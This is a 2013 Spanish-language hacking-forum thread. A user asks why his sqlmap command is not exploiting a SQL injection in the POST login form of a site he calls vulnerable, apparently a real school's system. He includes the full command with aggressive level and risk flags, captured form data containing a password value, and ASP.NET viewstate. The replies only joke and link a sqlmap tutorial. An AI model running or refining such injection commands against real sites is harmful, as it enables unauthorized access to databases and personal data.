Sólo texto | Texto con Imágenes

Underc0de - La Casa de los Informáticos

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: maxlife en Julio 13, 2013, 10:17:25 PM

Título: [SOLUCIONADO] SQLmap POST
Publicado por: maxlife en Julio 13, 2013, 10:17:25 PM
hola amigos tengo un incoveniente con una sql en method post SQLMAP

se que la web es vulnverable a sql y sql blind mi codigo es el siguente estoy bajo windows 7

sqlmap.py -u "https://webexplotable/login.aspx" --data="ctl00%24ContentPlaceHolder1%24btnSalir=Salir%20del%20Sistema&ctl00%24ContentPlaceHolder1%24cmbmodo=ADMINISTRATIVO&ctl00%24ContentPlaceHolder1%24LoginButton=Ingresar%20al%20Sistema&ctl00%24ContentPlaceHolder1%24Password=acUn3t1x&ctl00%24ContentPlaceHolder1%24UserName=&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=" - P" UserName"= --level=5 --risk=5 --dbs


URL encoded POST input ctl00%24ContentPlaceHolder1%24UserName was set to 1'" aqui me dice que campo es vulnverable pero no se que pasa mire el POST con el live hearders

y es este


ctl00%24ContentPlaceHolder1%24btnSalir=Salir%20del%20Sistema&ctl00%24ContentPlaceHolder1%24cmbmodo=ADMINISTRATIVO&ctl00%24ContentPlaceHolder1%24LoginButton=Ingresar%20al%20Sistema&ctl00%24ContentPlaceHolder1%24Password=acUn3t1x&ctl00%24ContentPlaceHolder1%24UserName=&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCwKnyoL%2bBwLpna7PDQKOg6mZCwLh1rXpCQLQgozABAKPpLWXBwLU2IP0DQLN49KjCQLo0YK0CQKh5%2fXjDQKckbKHC27CZUGKz1akLj6PFyG9vRwXHXNP&__LASTFOCUS=&__VIEWSTATE=%2fwEPDwUKMTM1MjAxMzAzNw9kFgJmD2QWAgIDD2QWAgIBD2QWBgIDDw8WAh4EVGV4dAUfTUnDiVJDT0xFUywgMTAgREUgSlVMSU8gREUgMjAxM2RkAgUPDxYCHwAFogQ8Yj5CZWNhcyB5IERlc2N1ZW50b3MgMjAxMy1CIEVYVFJBT1JESU5BUklBUzwvYj48L2JyPlNBRXcgKE9wY2nDs24gSW5mb3JtYWNpw7NuIEVzdHVkaWFudGlsLT5CaWVuZXN0YXIgRXN0dWRpYW50aWwtPlNvbGljaXR1ZCBCZWNhcy1EZXNjdWVudG9zKTwvYnI%2bIDxiPkRFTCAwOSBBTCAxOSBERSBKVUxJTzwvYj4gU29saWNpdHVkIGRlIEJlY2FzIHkgRGVzY3VlbnRvcyA8L2JyPiA8Yj5ERUwgMjIgQUwgMjYgREUgSlVMSU88L2I%2bPC9icj5WZXJpZmljYWNpw7NuIGRlIEluZm9ybWFjacOzbjwvYnI%2bPGI%2bREVMIDI5IEFMIDAyIERFIEFHT1NUTzwvYj48L2JyPkNvbmNlc2nDs24gZGUgQmVjYXMgeSBGaXJtYSBkZSBDb250cmF0b3MgZW4gRHB0by4gZGUgQmllbmVzdGFyIEVzdHVkaWFudGlsIHBhcmEgQmVjYXMgZGUgQ29sZWdpYXR1cmEsIFBvc3RncmFkbyB5IERlc2N1ZW50b3MgZGUgSGVybWFub3MgZSBIaWpvcy4gPC9icj5QYXJhIGxhcyBkZW3DoXMgQmVjYXMgZWwgcHJvY2VzbyBzZXLDoSBhIHBhcnRpciBkZWwgPGI%2bMTQgQWdvc3RvIGRlbCAyMDEzPC9iPi5kZAIID2QWAmYPZBYKAgEPEA8WBh4NRGF0YVRleHRGaWVsZAUETW9kbx4ORGF0YVZhbHVlRmllbGQFBE1vZG8eC18hRGF0YUJvdW5kZ2QQFQUOQURNSU5JU1RSQVRJVk8JQVNQSVJBTlRFDkNVUlNPQURJQ0lPTkFMCkVTVFVESUFOVEUIUFJPRkVTT1IVBQ5BRE1JTklTVFJBVElWTwlBU1BJUkFOVEUOQ1VSU09BRElDSU9OQUwKRVNUVURJQU5URQhQUk9GRVNPUhQrAwVnZ2dnZxYBZmQCBQ8QZGQWAWZkAhUPDxYEHglCYWNrQ29sb3IKpAEeBF8hU0ICCGRkAhcPZBYCZg9kFgoCAQ8PFgIeB1Zpc2libGVoZGQCCQ8QZGQWAGQCCw8QZGQWAGQCDQ8QZGQWAGQCDw8QZGQWAGQCHg8PZBYCHgdvbmNsaWNrBRxqYXZhc2NyaXB0OmNsb3N5bm9zaG93c21lKCk7ZGQVjZyfA5ZDIT4vXc2ucDkOvTT7IQ%3d%3d


mi pregunta es debo escribir todo eso o lo dejo como lo estoy haciendo ya que no explota el sql muchas gracias a todos espero Respuesta
Título: Re:SQLmap POST
Publicado por: blackdrake en Julio 16, 2013, 03:50:49 PM
Es simple, si no explota sql es que hay algo mal xDD

Un saludo.
Título: Re:SQLmap POST
Publicado por: blackdrake en Agosto 04, 2013, 12:31:29 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Eso pense  ;D

Pasate por aquí: http://underc0de.org/foro/bugs-y-exploits/sqli-automatizado-con-sqlmap/
Sólo texto | Texto con Imágenes